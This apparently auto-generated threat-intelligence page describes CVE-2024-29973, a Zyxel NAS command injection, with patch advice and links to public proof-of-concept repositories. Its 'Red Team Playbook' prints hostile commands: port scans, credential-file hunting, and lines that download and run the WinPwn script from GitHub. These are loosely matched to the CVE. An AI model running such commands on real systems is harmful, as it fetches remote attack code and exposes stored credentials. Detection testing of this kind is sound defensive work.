CVE-2024-29973
Overview
This vulnerability is a command injection flaw rooted in improper input validation of the "setCookie" parameter within Zyxel NAS326 and NAS542 firmware. The affected component fails to sanitize user-supplied data in HTTP POST requests, allowing execution of arbitrary operating system commands. The flaw exists in firmware versions prior to V5.21(AAZF.17)C0 for NAS326 and V5.21(ABAG.14)C0 for NAS542 devices.
Vulnerability Description
** UNSUPPORTED WHEN ASSIGNED ** The command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.
Impact
An unauthenticated remote attacker can execute arbitrary OS commands on vulnerable Zyxel NAS326 and NAS542 devices by exploiting this flaw, potentially compromising device integrity and confidentiality. No authentication or user interaction is required, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N). This can lead to full system compromise, data theft, service disruption, or lateral movement within the network environment where the device resides.
Solution
Zyxel has released firmware updates addressing this vulnerability: NAS326 firmware version V5.21(AAZF.17)C0 and NAS542 firmware version V5.21(ABAG.14)C0. Users should apply these updates immediately as detailed in Zyxel’s security advisory available at https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-vulnerabilities-in-nas-products-06-04-2024. No alternative workarounds are specified; patching is the recommended mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The command injection vulnerability present in specific firmware versions of Zyxel NAS326 and NAS542 devices allows an unauthenticated attacker to execute arbitrary operating system commands. This flaw exists in the "setCookie" parameter, which is improperly sanitized, enabling attackers to craft malicious HTTP POST requests that can manipulate the underlying system. The lack of input validation in this parameter creates a significant security hole, as it permits the execution of OS commands with the privileges of the web server process. Given that these devices are often deployed in home and small business environments, the potential for exploitation is particularly concerning.
Attack vectors for this vulnerability are straightforward, primarily involving the use of crafted HTTP POST requests targeting the vulnerable devices. An attacker could leverage tools such as cURL or custom scripts to send these requests, bypassing authentication mechanisms entirely. Once the command injection is successful, the attacker could execute a range of harmful actions, including but not limited to, data exfiltration, system manipulation, or even establishing persistent access to the device. Scenarios could involve an attacker gaining access to sensitive user data stored on the NAS, modifying configurations, or using the device as a launching pad for further attacks within the network.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on these devices for data storage and management. The high CVSS score of 9.8 indicates a critical risk level, suggesting that successful exploitation could lead to severe consequences, including data breaches, loss of data integrity, and potential downtime. Businesses may face reputational damage, regulatory fines, and the costs associated with incident response and recovery. Moreover, the exploitation of such vulnerabilities can lead to a broader compromise of the network, as attackers may pivot from the compromised device to other systems within the local environment.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to update the firmware of affected devices to the latest versions that address this flaw. Regular patch management practices should be established to ensure that all devices are kept up to date with security fixes. Additionally, network segmentation can help limit the exposure of vulnerable devices to the internet, reducing the attack surface. Monitoring network traffic for unusual patterns or unauthorized access attempts can also aid in early detection of exploitation attempts. Employing intrusion detection systems (IDS) can further enhance security by alerting administrators to potential attacks in real time.
In conclusion, the command injection vulnerability in Zyxel NAS326 and NAS542 firmware poses a serious threat to users and organizations that utilize these devices for data storage and management. The ease of exploitation, coupled with the potential for significant impact, underscores the necessity for immediate action to mitigate risks. By prioritizing firmware updates, implementing robust network security measures, and maintaining vigilant monitoring practices, organizations can protect themselves from the dangers posed by this vulnerability and enhance their overall cybersecurity posture.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the Zyxel NAS326 and NAS542 firmware vulnerability CVE-2024-29973. Our telemetry indicates a notable surge in detection activity, reflecting increased adversary interest and operational tempo. This trend coincides with the emergence of new proof-of-concept exploitation tools that enhance attack efficiency and accessibility for threat actors. Although the EPSS score remains stable at a high level, the expanded exploit landscape signals a growing risk of widespread compromise, particularly as these tools lower the barrier for less sophisticated attackers. For defenders, this development underscores the urgency of maintaining vigilant monitoring and reinforces the criticality of timely patch management. The evolving threat environment elevates the overall risk posture associated with this vulnerability, warranting heightened attention within security operations.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zyxel | Nas326 Firmware | All |
cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Nas542 Firmware | All |
cpe:2.3:o:zyxel:nas542_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (10)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
bigb0x/CVE-2024-29973
POC for CVE-2024-29973
|
bigb0x | 10 | 4 | 2024-06-19 | View |
|
NanoWraith/CVE-2024-29973
|
NanoWraith | 10 | 3 | 2024-06-20 | View |
|
RevoltSecurities/CVE-2024-29973
Exploiter a Vulnerability detection and Exploitation tool for CVE-2024-29973 with Asychronous Performance.
|
RevoltSecurities | 6 | 4 | 2024-06-21 | View |
|
solo364/CVE-2024-29973
|
solo364 | 2 | 1 | 2024-10-10 | View |
|
h21n/CVE-2024-29973
|
h21n | 2 | 1 | 2024-10-10 | View |
|
intel365/CVE-2024-29973
|
intel365 | 2 | 1 | 2024-10-10 | View |
|
kernel364/CVE-2024-29973
|
kernel364 | 2 | 1 | 2024-10-10 | View |
|
momika233/CVE-2024-29973
|
momika233 | 3 | 0 | 2024-06-19 | View |
|
voidbroker/CVE-2024-29973
|
voidbroker | 2 | 1 | 2024-10-10 | View |
|
p0et08/CVE-2024-29973
PoC and Bulk Scanner for CVE-2024-29973
|
p0et08 | 0 | 0 | 2024-06-21 | View |
Threat Feed
31 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-29973 |
| zyxel.com |
GitHub CVE
vendor-advisory
|
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-vulnerabilities-in-nas-products-06-04-2024 |
| outpost24.com |
GitHub CVE
|
https://outpost24.com/blog/zyxel-nas-critical-vulnerabilities/ |